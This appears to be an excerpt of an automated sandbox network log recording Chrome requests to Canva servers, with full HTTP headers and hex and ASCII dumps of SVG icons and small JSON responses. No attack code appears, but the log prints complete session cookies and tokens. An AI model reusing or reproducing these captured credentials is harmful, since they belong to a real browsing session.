                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1171INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 45 46 39 36 34 35 22 20 64 3d 22 4d 33 32 2e 33 30 32 20 32 34 2e 33 34 37 63 2d 2e 36 39 35 2d 31 2e 30 31 2d 2e 33 30 37 2d 32 2e 34 37 2d 2e 34 38 2d 34 2e 30 38 32 2d 2e 31 37 38 2d 32 2e 36 33 2d 31 2e 33 30 38 2d 35 2e 31 37 38 2d 33 2e 35 2d 37 2e 32 31 36 6c 2d 37 2e 34 36 36 2d 36 2e 39 34 32 73 2d 31 2e 34 37 31 2d 31 2e 33 36 39 2d 32 2e 38 34 31 2e 31 30 33 63 2d 31 2e 33 36 38 20 31 2e 34 37 31 2e 31 30 34 20 32 2e 38 34 2e 31 30 34 20 32 2e 38 34 6c 33 2e 31 35 34 20 32 2e 39 33 34 20 32 2e 37 33 34 20 32 2e 35 34 32 73 2d 2e
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#EF9645" d="M32.302 24.347c-.695-1.01-.307-2.47-.48-4.082-.178-2.63-1.308-5.178-3.5-7.216l-7.466-6.942s-1.471-1.369-2.841.103c-1.368 1.471.104 2.84.104 2.84l3.154 2.934 2.734 2.542s-.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1141INData Raw: 30 20 30 20 31 2d 2e 33 33 33 2e 30 35 37 7a 6d 32 39 2e 34 36 2d 32 31 2e 37 36 37 61 31 20 31 20 30 20 30 20 31 2d 2e 37 30 37 2d 31 2e 37 30 38 6c 33 2e 35 35 32 2d 33 2e 35 35 61 31 20 31 20 30 20 30 20 31 20 31 2e 34 31 34 20 31 2e 34 31 35 6c 2d 33 2e 35 35 32 20 33 2e 35 35 61 2e 39 39 33 2e 39 39 33 20 30 20 30 20 31 2d 2e 37 30 37 2e 32 39 33 7a 6d 2d 34 2e 31 36 34 2d 31 2e 36 39 37 61 31 20 31 20 30 20 30 20 31 2d 2e 39 34 34 2d 31 2e 33 33 31 6c 2e 39 37 2d 32 2e 37 37 33 61 31 20 31 20 30 20 30 20 31 20 31 2e 38 38 38 2e 36 36 6c 2d 2e 39 37 20 32 2e 37 37 33 61 31 20 31 20 30 20 30 20 31 2d 2e 39 34 34 2e 36 37 31 7a 6d 36 2e 31 34 33 20 35 2e 37 37 34 61 31 2e 30 30 31 20 31 2e 30 30 31 20 30 20 30 20 31 2d 2e 33 33 33 2d 31 2e 39 34 33 6c
                                                                                                                                                                                                                                                                    Data Ascii: 0 0 1-.333.057zm29.46-21.767a1 1 0 0 1-.707-1.708l3.552-3.55a1 1 0 0 1 1.414 1.415l-3.552 3.55a.993.993 0 0 1-.707.293zm-4.164-1.697a1 1 0 0 1-.944-1.331l.97-2.773a1 1 0 0 1 1.888.66l-.97 2.773a1 1 0 0 1-.944.671zm6.143 5.774a1.001 1.001 0 0 1-.333-1.943l


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    89192.168.2.1249816104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC639OUTGET /web/images/749002f5a04f784cc1802d77d2fed423.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 2725
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513a7dd1189d-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1583354
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "749002f5a04f784cc1802d77d2fed423"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 12 Sep 2024 09:09:04 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 13 Sep 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: Tz7SQD/JpRRsclcmnT6ufA3oZuf90FX3arphDjfxhfMfsqDpLW2+jntDGv4wMhRirusFIehSBxs=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 0JZMVBSQDKF4QED9
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: bRl9W2hnRIqMdZrXuZZA2_nYmFfi7jbn
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 61 6f 5a 33 6e 5a 63 32 46 4d 65 42 42 70 52 59 62 6f 43 65 4b 78 6f 63 72 49 34 55 78 52 70 64 79 41 77 42 73 57 6f 71 75 55 7a 34 6f 6c 54 67 51 30 36 6d 4b 50 58 5a 47 56 67 73 79 64 51 48 6b 57 34 79 70 4c 48 25 32 42 34 45 25 32 42 6e 51 79 6a 35 67 77 76 32 69 71 37 42 64 69 79 4a 52 31 56 6e 71 41 67 42 48 68 39 39 33 25 32 46 4e 44 64 46 79 6e 48 68 51 73 62 76 75 61 50 41 30 41 48 5a 78 6a 6e 4d 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aoZ3nZc2FMeBBpRYboCeKxocrI4UxRpdyAwBsWoquUz4olTgQ06mKPXZGVgsydQHkW4ypLH%2B4E%2BnQyj5gwv2iq7BdiyJR1VnqAgBHh993%2FNDdFynHhQsbvuaPA0AHZxjnMk%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1199INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 36 30 22 20 68 65 69 67 68 74 3d 22 36 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 30 20 36 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 39 2e 38 30 38 20 33 31 2e 39 32 31 63 30 20 2e 39 36 33 2e 32 35 32 20 31 2e 36 31 32 2e 38 39 35 20 31 2e 36 31 32 20 31 2e 31 30 32 20 30 20 32 2e 31 38 39 2d 32 2e 39 39 35 20 32 2e 31 38 39 2d 34 2e 36 39 32 20 30 2d 2e 37 36 32 2d 2e 32 30 32 2d 31 2e 33 38 37 2d 2e 37 32 39 2d 31 2e 33 38 37 2d 31 2e 32 31 31 20 30 2d 32 2e 33 35 35 20 32 2e 37 39 37 2d 32 2e 33 35 35 20 34 2e 34 36 37 7a 6d 32 32 2e 33 34 37 2d 35 2e 30 31 31 63 30 20
                                                                                                                                                                                                                                                                    Data Ascii: <svg width="60" height="60" viewBox="0 0 60 60" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M19.808 31.921c0 .963.252 1.612.895 1.612 1.102 0 2.189-2.995 2.189-4.692 0-.762-.202-1.387-.729-1.387-1.211 0-2.355 2.797-2.355 4.467zm22.347-5.011c0
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1369INData Raw: 30 31 2d 32 2e 36 31 35 20 31 2e 38 30 31 2d 2e 38 36 38 20 30 2d 31 2e 35 33 35 2d 2e 35 36 39 2d 31 2e 37 38 37 2d 31 2e 37 32 37 2d 2e 36 35 34 20 31 2e 31 30 38 2d 31 2e 35 31 20 31 2e 37 33 36 2d 32 2e 35 36 38 20 31 2e 37 33 36 2d 31 2e 31 38 38 20 30 2d 31 2e 39 36 37 2d 2e 38 39 35 2d 32 2e 30 38 38 2d 32 2e 36 31 36 2d 31 2e 30 37 38 20 32 2e 30 37 37 2d 33 2e 30 37 35 20 33 2e 38 35 31 2d 35 2e 33 35 39 20 33 2e 38 35 31 43 38 2e 39 33 37 20 33 36 2e 30 37 34 20 37 20 33 33 2e 37 30 38 20 37 20 32 39 2e 37 38 33 20 37 20 32 34 2e 38 35 20 31 30 2e 38 35 20 32 31 20 31 34 2e 36 37 35 20 32 31 63 32 2e 33 31 36 20 30 20 33 2e 36 32 33 20 31 2e 31 38 32 20 33 2e 36 32 33 20 32 2e 37 39 33 20 30 20 31 2e 36 31 32 2d 31 2e 31 38 32 20 32 2e 37 39 34
                                                                                                                                                                                                                                                                    Data Ascii: 01-2.615 1.801-.868 0-1.535-.569-1.787-1.727-.654 1.108-1.51 1.736-2.568 1.736-1.188 0-1.967-.895-2.088-2.616-1.078 2.077-3.075 3.851-5.359 3.851C8.937 36.074 7 33.708 7 29.783 7 24.85 10.85 21 14.675 21c2.316 0 3.623 1.182 3.623 2.793 0 1.612-1.182 2.794
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC157INData Raw: 32 33 33 2e 35 31 33 20 30 20 2e 37 32 2e 31 38 37 2e 37 32 2e 35 36 36 61 31 2e 34 31 37 20 31 2e 34 31 37 20 30 20 30 20 31 2d 2e 30 38 2e 34 31 38 63 2d 2e 34 30 33 20 31 2e 33 30 33 2d 31 2e 32 31 32 20 34 2e 31 35 39 2d 31 2e 32 31 32 20 35 2e 35 30 33 20 30 20 2e 35 34 2e 31 32 35 2e 38 38 33 2e 34 33 33 2e 38 38 33 2e 35 33 36 20 30 20 31 2e 31 38 38 2d 2e 38 32 20 31 2e 36 37 2d 32 2e 31 39 35 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                                                                                                                                                                                                                    Data Ascii: 233.513 0 .72.187.72.566a1.417 1.417 0 0 1-.08.418c-.403 1.303-1.212 4.159-1.212 5.503 0 .54.125.883.433.883.536 0 1.188-.82 1.67-2.195z" fill="#fff"/></svg>


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    90192.168.2.1249818104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1393OUTGET /_ajax/reaction/reactions/summaries?parentArtifactType=DOCUMENT&source=B&reactedObjectType=B&limit=100&documentId=DAGXBQfQ3AM&documentExtension=BvO9V97vV3Qk87FqBY6pdQ HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1056INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513a786843b7-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                                    x-request-id: 8e59513a786843b7
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ueBEEo7Zzd7P5VfaXl0urRkAUnNp4pbNFN8LqmlBIAmw84ghtImzZIelA4Ie%2FdoN8L3LCdqKw4mPUBmR%2FrLAMuYpdsEwel0zIZ%2B%2Be6%2Fznq4O%2BtmJTVES2KaPP4Hb8wQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC63INData Raw: 33 39 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 7b 22 41 3f 22 3a 22 41 22 2c 22 41 22 3a 5b 5d 2c 22 42 22 3a 5b 5d 2c 22 44 22 3a 5b 5d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 39'"])}while(1);</x>//{"A":{"A?":"A","A":[],"B":[],"D":[]}}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    91192.168.2.1249819104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1302OUTGET /_ajax/reaction/config/DAGXBQfQ3AM?documentExtension=BvO9V97vV3Qk87FqBY6pdQ HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e1e4343d9-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                                    x-request-id: 8e59513e1e4343d9
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AcYdWSwoWnHihPZuS3ReXpbsxstF8s59UYunD5qY5RtG9VsTGITJO2KZkOlpwcjVRS3khCkQQ4ylX0yyEwrNgM7BGoZZYvAEjkVxMflO4gqJrC0steuyT6mHjHWba3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC58INData Raw: 33 34 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 7b 22 41 22 3a 66 61 6c 73 65 7d 2c 22 42 22 3a 7b 22 41 22 3a 74 72 75 65 7d 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 34'"])}while(1);</x>//{"A":{"A":false},"B":{"A":true}}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    92192.168.2.1249828104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC652OUTGET /chunk-batch/5756a030498f80f0.js+b3bc71e281d55f78.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1148INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 19427
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e1a101875-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49963
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:17 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: lciN7bHCMnagVcQ1IttfFB0zF4rT5+G9Xiox27kYewuFAudcaXGT9oqz5HuASwsdgqlXZsudA94=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: CPYGY0T0VH684CWZ
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: VfS41lenCWjjboc1vnem1GKyKg2CLlMU
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC364INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 51 78 59 54 31 41 44 65 32 6d 4e 55 6d 52 7a 25 32 46 70 77 41 4c 75 4a 6a 6e 53 43 55 30 6b 59 58 54 30 6c 68 34 75 6f 34 7a 25 32 42 66 61 30 63 57 64 42 42 45 69 57 4a 64 41 4e 64 25 32 42 49 6f 53 25 32 46 71 56 42 4a 75 46 41 36 4a 6d 4c 75 4c 36 65 37 6d 48 68 32 72 6b 54 44 34 47 77 5a 33 46 56 71 63 66 72 77 5a 47 68 4e 47 37 63 61 4d 73 75 35 50 4f 68 7a 47 4a 54 58 4e 39 45 79 34 32 50 61 33 52 33 33 6e 4d 33 6e 65 66 59 78 52 67 4b 54 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QxYT1ADe2mNUmRz%2FpwALuJjnSCU0kYXT0lh4uo4z%2Bfa0cWdBBEiWJdANd%2BIoS%2FqVBJuFA6JmLuL6e7mHh2rkTD4GwZ3FVqcfrwZGhNG7caMsu5POhzGJTXN9Ey42Pa3R33nM3nefYxRgKTQ%3D"}],"group":"cf-nel","m
